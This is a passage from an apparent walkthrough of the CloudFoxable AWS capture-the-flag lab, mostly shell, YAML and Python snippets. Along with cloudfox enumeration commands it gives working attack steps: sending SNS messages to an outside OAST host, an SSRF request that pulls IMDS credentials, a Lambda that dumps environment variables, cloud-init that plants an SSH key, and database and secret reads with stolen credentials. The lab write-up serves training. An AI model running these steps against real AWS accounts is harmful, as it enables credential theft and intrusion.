</pre></table></code></div></div><p>This gives an incomplete flag in the body of the HTML received, with the placeholder there being the name of the principal that can also read the environment variables of username and password aside from the <code class="language-plaintext highlighter-rouge">ctf-starting-user</code>. This can be done by <code class="language-plaintext highlighter-rouge">cloudfox</code> with the following →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>cloudfox aws permissions <span class="nt">-p</span> cloudfoxable <span class="nt">-v2</span> | <span class="nb">grep</span> <span class="s2">"lambda:ListFunctions"</span>
</pre></table></code></div></div><p>This gives the role of interest as <code class="language-plaintext highlighter-rouge">mewis</code>, substituting which in the placeholder provides the correct flag.</p><h2 id="the-topic-is-exposure"><span class="me-2">The topic is exposure</span><a href="#the-topic-is-exposure" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>This challenge starts with <code class="language-plaintext highlighter-rouge">ctf-starting-user</code> and requires checking out public resources. This is also a good time to run the <code class="language-plaintext highlighter-rouge">all-chekcs</code> subcommand for <code class="language-plaintext highlighter-rouge">cloudfox</code> to cache all the checks for fast analysis. Looking through all available subcommands, <code class="language-plaintext highlighter-rouge">resource-trusts</code> can be used to check the permissions granted over specific resources.</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>cloudfox aws resource-trusts <span class="nt">-c</span> <span class="nt">-p</span> cloudfoxable <span class="nt">-v2</span>
</pre></table></code></div></div><p>The only resource that stands out most is the <code class="language-plaintext highlighter-rouge">eventbridge-sns</code> SNS topic since it allows public subscriptions. In this case, it has a condition to limit it to only those entities that come form a certain (our home) IP, which is a nice bit of security control added in the Cloudfoxable labs. Checking results from →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>cloudfox aws sns <span class="nt">-c</span> <span class="nt">-p</span> cloudfoxable <span class="nt">-v2</span>
</pre></table></code></div></div><p>and reading the loot, the SNS topic can be subscribed to as follows →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>awsn <span class="nt">--region</span> us-west-2 sns subscribe <span class="nt">--topic-arn</span> arn:aws:sns:us-west-2:&lt;ACCID&gt;:eventbridge-sns <span class="nt">--protocol</span> http <span class="nt">--notification-endpoint</span> http://xxxxx.oast.fun <span class="nt">--profile</span> attacker
</pre></table></code></div></div><p>A public interact.sh server can be used to retrieve the topic notification. With the subscription active, it can be confirmed with the resulting token on the OAST server in a request as follows →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>awsn <span class="nt">--region</span> us-west-2 sns confirm-subscription <span class="nt">--token</span> <span class="s2">"&lt;fromrequest&gt;"</span> <span class="nt">--topic-arn</span> arn:aws:sns:us-west-2:&lt;ACCID&gt;:eventbridge-sns <span class="nt">--profile</span> attacker
</pre></table></code></div></div><p>After this, the lab will automatically send a publish message with sensitive information every 1 minute through Eventbridge schedules. This message is received on the OAST server and also gives the flag.</p><h2 id="search-1--2"><span class="me-2">Search 1 &amp; 2</span><a href="#search-1--2" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>These challenges start with the <code class="language-plaintext highlighter-rouge">ctf-starting-user</code> and requires searching for an Elasticsearch domain and find a flag there. Next, it requires searching further within the ES domain to pivot beyond the Cloudfoxable environment.</p><p>To start off, the easiest way to search for the exposed ES domain is via <code class="language-plaintext highlighter-rouge">cloudfox</code> →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>cloudfox aws endpoints <span class="nt">-p</span> cloudfoxable <span class="nt">-v2</span>
</pre></table></code></div></div><p>Then using <code class="language-plaintext highlighter-rouge">cURL</code>, visit the domain and listing the indices and then visit each index, in this case <em>webserver-logs</em> provided what is necessary →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>curl <span class="nt">-X</span> GET <span class="s2">"https://search-pat-xxxxxx.us-west-2.es.amazonaws.com/_cat/indices?v"</span>
curl <span class="nt">-X</span> GET <span class="s2">"https://search-pat-xxxxxx.us-west-2.es.amazonaws.com/webserver-logs/_search?pretty=true"</span>
</pre></table></code></div></div><p>This gives the first flag and also has a base64 encoded token, decoding which gives a GitHub personal access token. This can be used to login to github, search for repositories and clone a repository as follows →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre><td class="rouge-code"><pre><span class="nb">echo</span> <span class="nv">$githubtoken</span> | gh auth login <span class="nt">--with-token</span>
gh auth status
gh repo list
gh repo clone cloudfoxable/super-secret-ML-stuff <span class="c"># login with un: cloudfoxable and pw as the PAT</span>
<span class="nb">cd </span>super-secret-ML-stuff <span class="o">&amp;&amp;</span> <span class="nb">cat </span>main.go
</pre></table></code></div></div><p>The <code class="language-plaintext highlighter-rouge">main.go</code> file contained the second flag.</p><h2 id="bastion"><span class="me-2">Bastion</span><a href="#bastion" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>This challenge starts with the <code class="language-plaintext highlighter-rouge">ctf-starting-user</code> and sets the stage for SSM operations. It spins up an instance that can be connected to by <code class="language-plaintext highlighter-rouge">ctf-starting-user</code>. To get the details on the instance, the following helps →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>cloudfox aws instances <span class="nt">-p</span> cloudfoxable <span class="nt">-v2</span>
</pre></table></code></div></div><p>With the SSM agent installed, this instance can be connected to using the following →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>awsn <span class="nt">--region</span> us-west-2 ssm start-session <span class="nt">--target</span> i-xxxxx <span class="nt">--profile</span> cloudfoxable
</pre></table></code></div></div><p>Checking the STS credentials on the instance, it’s found that role <code class="language-plaintext highlighter-rouge">reyna</code> is granted to the instance. Using <code class="language-plaintext highlighter-rouge">cloudfox</code> to determine the permissions as follows →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>cloudfox aws permissions <span class="nt">--principal</span> reyna <span class="nt">-p</span> cloudfoxable <span class="nt">-v2</span>
</pre></table></code></div></div><p>This shows that <code class="language-plaintext highlighter-rouge">reyna</code> had permissions to list and get objects from the <code class="language-plaintext highlighter-rouge">cloudfoxable-bastion-xxxx</code> bucket, with the flag contained within.</p><h2 id="variable"><span class="me-2">Variable</span><a href="#variable" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>This challenge requires starting from the bastion host and pivoting inside the network. <code class="language-plaintext highlighter-rouge">cloudfox</code> can help retrieve information about the network with the following →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>cloudfox aws elastic-network-interfaces <span class="nt">-p</span> cloudfoxable <span class="nt">-v2</span>
</pre></table></code></div></div><p>This lists several ENIs, with one being an RDS network interface. It is also in the same VPC as the bastion host, which means it’s likely reachable internally. This can be further confirmed by looking up security groups, but it’s worth just naively trying to connect.</p><p>The next thing needed is to get information about the database and search for credentials to connect. The network interfaces also list some related to Lambda functions with the name <code class="language-plaintext highlighter-rouge">...rds-sql-executor...</code>, so looking at Lambda functions might give a clue about the credentials. <code class="language-plaintext highlighter-rouge">cloudfox</code> can help by looking at environment variables of Lambda functions in the following way →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>cloudfox aws databases <span class="nt">-p</span> cloudfoxable <span class="nt">-v2</span> <span class="c"># gives the DNS endpoint for the RDS instance</span>
cloudfox aws env-vars <span class="nt">-p</span> cloudfoxable <span class="nt">-v2</span>
</pre></table></code></div></div><p>This lists the RDS host, database name, password and username. Using those to connect to the RDS instance as follows →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre>mysql <span class="nt">-u</span> admin <span class="nt">-h</span> cloudfox-rds-xxxx.xxxxx.us-west-2.rds.amazonaws.com <span class="nt">-D</span> cloudfoxxxxx <span class="nt">-p</span> <span class="c"># enter passwords</span>
<span class="o">&gt;</span> show tables<span class="p">;</span> <span class="c"># lists `credit_cards`</span>
<span class="o">&gt;</span> <span class="k">select</span> <span class="k">*</span> from credit_cards<span class="p">;</span>
</pre></table></code></div></div><p>That gives the flag.</p><h2 id="trust-me"><span class="me-2">Trust Me</span><a href="#trust-me" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>This challenge requires setting up a GitHub repo that is trusted by “something” in the environment. The challenge asks to find a role that trusts this repo and use that role to get a flag. Roles can be listed with <code class="language-plaintext highlighter-rouge">cloudfox</code> and trusts between them can also be listed as follows →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>cloudfoxable aws principals <span class="nt">-p</span> cloudfoxable <span class="nt">-v2</span>
cloudfoxable aws role-trusts <span class="nt">-p</span> cloudfoxable <span class="nt">-v2</span>
</pre></table></code></div></div><p>Role trusts lists role <code class="language-plaintext highlighter-rouge">t_rodman</code> with trust established for the repo we created. Looking at <code class="language-plaintext highlighter-rouge">t_rodman</code> via gaad-analysis →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre><span class="nb">cat </span>cloudfoxable-gaad.json | jq <span class="s1">'.RoleDetailList[] | select(.RoleName=="t_rodman")'</span>
<span class="c"># this gave an attached policy called trust-me</span>
<span class="nb">cat </span>cloudfoxable-gaad.json | jq <span class="s1">'.Policies[] | select(.PolicyName=="trust-me")'</span>
</pre></table></code></div></div><p>This shows that a GitHub Action can be used to authenticate as <code class="language-plaintext highlighter-rouge">t_rodman</code> via <code class="language-plaintext highlighter-rouge">sts:AssumeRoleWithWebIdentity</code> from the repo in concern. Also, the role can get SSM parameters <code class="language-plaintext highlighter-rouge">trust-*</code>. With a little googling, this can be done via an action published by AWS. In the repo, a workflow can be set up as follows →</p><div class="language-yml highlighter-rouge"><div class="code-header"> <span data-label-text="YAML"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
</pre><td class="rouge-code"><pre><span class="na">name</span><span class="pi">:</span> <span class="s">cloudfoxableattack</span>
<span class="na">on</span><span class="pi">:</span>
  <span class="na">push</span><span class="pi">:</span>
    <span class="na">branches</span><span class="pi">:</span> <span class="pi">[</span> <span class="nv">main</span> <span class="pi">]</span>
<span class="na">permissions</span><span class="pi">:</span>
  <span class="na">id-token</span><span class="pi">:</span> <span class="s">write</span>
  <span class="na">contents</span><span class="pi">:</span> <span class="s">read</span>
<span class="na">jobs</span><span class="pi">:</span>
  <span class="na">AssumeRole</span><span class="pi">:</span>
    <span class="na">runs-on</span><span class="pi">:</span> <span class="s">ubuntu-latest</span>
    <span class="na">steps</span><span class="pi">:</span>
      <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">clone repo</span>
        <span class="na">uses</span><span class="pi">:</span> <span class="s">actions/checkout@v3</span>
      <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">set creds</span>
        <span class="na">uses</span><span class="pi">:</span> <span class="s">aws-actions/configure-aws-credentials@v2</span>
        <span class="na">with</span><span class="pi">:</span>
          <span class="na">role-to-assume</span><span class="pi">:</span> <span class="s">arn:aws:iam::&lt;ACCID&gt;:role/t_rodman</span>
          <span class="na">aws-region</span><span class="pi">:</span> <span class="s">us-west-2</span>
      <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">perform action</span>
        <span class="na">run</span><span class="pi">:</span> <span class="pi">|</span>
          <span class="s">aws --region us-west-2 ssm get-parameter --with-decryption --name trust-me</span>
</pre></table></code></div></div><p>Committing this to the repo runs the actions and the parameter value can be see in the Action logs, which is also the flag.</p><h2 id="wyatt"><span class="me-2">Wyatt</span><a href="#wyatt" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>This challenge starts with the bastion host from previous challenges, to provide an internal foothold. It needs us to scan for services in the VPC and figure out next steps to get a flag.</p><p>To start, it’s best to scan for network-related items, ENIs, and instances (given we’re in a network). That gives an idea about the roles granted to the instances, so those roles can analyzed for permissions, which provides further hints into the type of services to look into. The following commands helped narrow down to objects of interest →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre>cloudfox aws elastic-network-interfaces <span class="nt">-p</span> cloudfoxable <span class="nt">-v2</span> <span class="c"># instances are of primary interest</span>
cloudfox aws network-ports <span class="nt">-p</span> cloudfoxable <span class="nt">-v2</span> <span class="c"># shows open ports based on SGs for instances (IPs)</span>
cloudfox aws instances <span class="nt">-p</span> cloudfoxable <span class="nt">-v2</span> <span class="c"># shows the instances and associated roles (get role/wyatt)</span>
cloudfox aws permissions <span class="nt">--principal</span> wyatt <span class="nt">-p</span> cloudfoxable <span class="nt">-v2</span> <span class="c"># check permissions of wyatt</span>
</pre></table></code></div></div><p>This shows that role <code class="language-plaintext highlighter-rouge">wyatt</code> had access to perform some operations on DynamoDB table <code class="language-plaintext highlighter-rouge">wyatt-table</code>. The instance in concern has a public and private IP, but visiting the service via the bastion to keep it internal →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>nmap <span class="nt">-Pn</span> <span class="nt">-p</span> 12380 &lt;PrivateIP&gt; <span class="c"># potentially looks like a webserver</span>
curl http://&lt;PrivateIP&gt;:12380 <span class="c"># gives a classic SSRF application that takes in a URL and visits it</span>
</pre></table></code></div></div><p>So, passing in the URL for IMDSv1 to get the credentials of <code class="language-plaintext highlighter-rouge">wyatt</code> as →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>curl http://&lt;PrivateIP&gt;:12380?url<span class="o">=</span>http://169.254.169.254/latest/meta-data/iam/security-credentials/wyatt
</pre></table></code></div></div><p>This gave the credentials for <code class="language-plaintext highlighter-rouge">wyatt</code> using which a scan operation could be performed on the <code class="language-plaintext highlighter-rouge">wyatt-table</code> table as follows to get the flag →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>awsn dynamodb scan <span class="nt">--table-name</span> wyatt-table <span class="nt">--region</span> us-west-2 <span class="nt">--profile</span> wyatt
</pre></table></code></div></div><h2 id="double-tap"><span class="me-2">Double Tap</span><a href="#double-tap" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>This challenge requires starting at <code class="language-plaintext highlighter-rouge">ctf-starting-user</code> and getting to a secret <code class="language-plaintext highlighter-rouge">DT_Flag</code>. The following <code class="language-plaintext highlighter-rouge">cloudfox</code> commands help narrow down analysis and search →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
</pre><td class="rouge-code"><pre>cloudfox aws principals <span class="nt">-p</span> cloudfoxable <span class="nt">-v2</span>
cloudfox aws permissions <span class="nt">--principal</span> double_tap_asdf <span class="nt">-p</span> cloudfoxable <span class="nt">-v2</span>
cloudfox aws permissions <span class="nt">--principal</span> double_tap_esdf <span class="nt">-p</span> cloudfoxable <span class="nt">-v2</span>
cloudfox aws permissions <span class="nt">--principal</span> double_tap_qsdf <span class="nt">-p</span> cloudfoxable <span class="nt">-v2</span>
cloudfox aws permissions <span class="nt">--principal</span> double_tap_secret <span class="nt">-p</span> cloudfoxable <span class="nt">-v2</span>
cloudfox aws permissions <span class="nt">--principal</span> double_tap_xsdf <span class="nt">-p</span> cloudfoxable <span class="nt">-v2</span>
cloudfox aws permissions <span class="nt">--principal</span> double_tap_zsdf <span class="nt">-p</span> cloudfoxable <span class="nt">-v2</span>
cloudfox aws permissions <span class="nt">--principal</span> lambda_ec2 <span class="nt">-p</span> cloudfoxable <span class="nt">-v2</span>
awsn ec2 describe-instances <span class="nt">--region</span> us-west-2 <span class="nt">--profile</span> cloudfoxable | jq <span class="s1">'.Reservations[].Instances[] | select(.Tags[].Key=="double_tap1") | .InstanceId'</span>
cloudfox aws instances <span class="nt">-p</span> cloudfoxable <span class="nt">-v2</span>
cloudfox aws role-trusts <span class="nt">-p</span> cloudfoxable <span class="nt">-v2</span>
cloudfox aws permissions <span class="nt">--principal</span> ec2_privileged <span class="nt">-p</span> cloudfoxable <span class="nt">-v2</span>
<span class="nb">cat </span>cloudfoxable-gaad.json | jq <span class="s1">'.Policies[] | select(.PolicyName=="ec2_privileged_policy")'</span>
awsn ec2 describe-instances <span class="nt">--region</span> us-west-2 <span class="nt">--profile</span> cloudfoxable | jq <span class="s1">'.Reservations[].Instances[] | select(.Tags[].Key=="double_tap2") | .InstanceId'</span>
</pre></table></code></div></div><p>This analysis gives the following potential attack path →</p><ul><li><code class="language-plaintext highlighter-rouge">ctf-starting-user</code> can assume role <code class="language-plaintext highlighter-rouge">double_tap_xsdf</code><li><code class="language-plaintext highlighter-rouge">double_tap_xsdf</code> can create and invoke Lambda functions and pass <code class="language-plaintext highlighter-rouge">lambda_*</code> roles<li>Role<code class="language-plaintext highlighter-rouge">lambda_ec2</code> has full EC2 access if the resource has tag <code class="language-plaintext highlighter-rouge">double_tap1</code> equal to <code class="language-plaintext highlighter-rouge">true</code>, which was true for an instance that had the <code class="language-plaintext highlighter-rouge">ec2_privileged</code> role attached to it<li><code class="language-plaintext highlighter-rouge">ec2_privileged</code> role can perform <code class="language-plaintext highlighter-rouge">ssm:SendCommand</code> and <code class="language-plaintext highlighter-rouge">ssm:StartSession</code> as long as the resource has the <code class="language-plaintext highlighter-rouge">double_tap2</code> tag equal to <code class="language-plaintext highlighter-rouge">true</code>, which was true for the instance that had the <code class="language-plaintext highlighter-rouge">double_tap_secret</code> role attached<li><code class="language-plaintext highlighter-rouge">double_tap_secret</code> role could read the secret in concern</ul><p>A Lambda function can be deployed with the following code →</p><div class="language-python highlighter-rouge"><div class="code-header"> <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre><span class="kn">import</span> <span class="n">os</span>

<span class="k">def</span> <span class="nf">lambda_handler</span><span class="p">(</span><span class="n">event</span><span class="p">,</span> <span class="n">context</span><span class="p">):</span>
    <span class="k">return</span> <span class="nf">dict</span><span class="p">(</span><span class="n">os</span><span class="p">.</span><span class="n">environ</span><span class="p">)</span>
</pre></table></code></div></div><p>Commands to execute for the Lambda attack are as follows →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre><td class="rouge-code"><pre>zip lambda_function.zip lambda_function.py
<span class="c"># deploy function</span>
awsn lambda create-function <span class="nt">--function-name</span> attackfunction <span class="nt">--runtime</span> python3.8 <span class="nt">--role</span> arn:aws:iam::&lt;ACCID&gt;:role/lambda_ec2 <span class="nt">--handler</span> lambda_function.lambda_handler <span class="nt">--zip-file</span> fileb://lambda_function.zip <span class="nt">--profile</span> double_tap_xsdf
<span class="c"># invoke function</span>
awsn lambda invoke <span class="nt">--function-name</span> attackfunction <span class="nt">--profile</span> double_tap_xsdf outputfile
<span class="c"># get credentials</span>
<span class="nb">cat </span>outputfile | jq
</pre></table></code></div></div><p>With these credentials, access to the instance that has the <code class="language-plaintext highlighter-rouge">ec2_privileged</code> role is needed. The instance has an open port 22, but it needs an SSH key. User data does not run after starting a stopped instance unless it is used as a <code class="language-plaintext highlighter-rouge">cloud-init</code> script, which can be defined as the following →</p><div class="language-yml highlighter-rouge"><div class="code-header"> <span data-label-text="YAML"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre><td class="rouge-code"><pre><span class="c1">#cloud-config</span>
<span class="na">cloud_final_modules</span><span class="pi">:</span>
  <span class="pi">-</span> <span class="pi">[</span><span class="nv">users-groups</span><span class="pi">,</span><span class="nv">always</span><span class="pi">]</span>
<span class="na">users</span><span class="pi">:</span>
  <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">ec2-user</span>
    <span class="na">ssh-authorized-keys</span><span class="pi">:</span>
      <span class="pi">-</span> <span class="s">ssh-ed25519 keydatakeydatakeydatakeydatakeydatakeydata user@host</span>
</pre></table></code></div></div><p>The key used can be generated as →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>ssh-keygen <span class="nt">-t</span> ed25519 <span class="nt">-b</span> 2048 <span class="c"># save as ec2_key</span>
</pre></table></code></div></div><p>The YAML content can be stored in a file <code class="language-plaintext highlighter-rouge">userdatanormal.txt</code> and then converted to base64 with →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="nb">base64 </span>userdatanormal.txt <span class="o">&gt;</span> userdataencoded.txt
</pre></table></code></div></div><p>Then, the following can be used to deploy a key using the session of <code class="language-plaintext highlighter-rouge">lambda_ec2</code> →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre>awsn ec2 stop-instances <span class="nt">--instance-id</span> i-0hshshshshhshs <span class="nt">--region</span> us-west-2 <span class="nt">--profile</span> lambda_ec2
awsn ec2 modify-instance-attribute <span class="nt">--instance-id</span> i-0hshshshshhshs <span class="nt">--attribute</span> userData <span class="nt">--value</span> file:userdataencoded.txt <span class="nt">--region</span> us-west-2 <span class="nt">--profile</span> lambda_ec2
awsn ec2 start-instances <span class="nt">--instance-id</span> i-0hshshshshhshs <span class="nt">--region</span> us-west-2 <span class="nt">--profile</span> lambda_ec2
</pre></table></code></div></div><p>This instates the key into the instance and allows SSH-ing into the instance associated with the <code class="language-plaintext highlighter-rouge">ec2_privileged</code> role, which allows us to start an SSM session with the other instance with the <code class="language-plaintext highlighter-rouge">double_tap2</code> tag and associated role <code class="language-plaintext highlighter-rouge">double_tap_secret</code> to read the secret flag →</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>awsn ssm start-session <span class="nt">--target</span> i-06eeb27aff191127a <span class="nt">--region</span> us-west-2 <span class="nt">--profile</span> ec2_privileged
aws <span class="nt">--region</span> us-west-2 secretsmanager get-secret-value <span class="nt">--secret-id</span> DT_flag <span class="c"># from the instance</span>
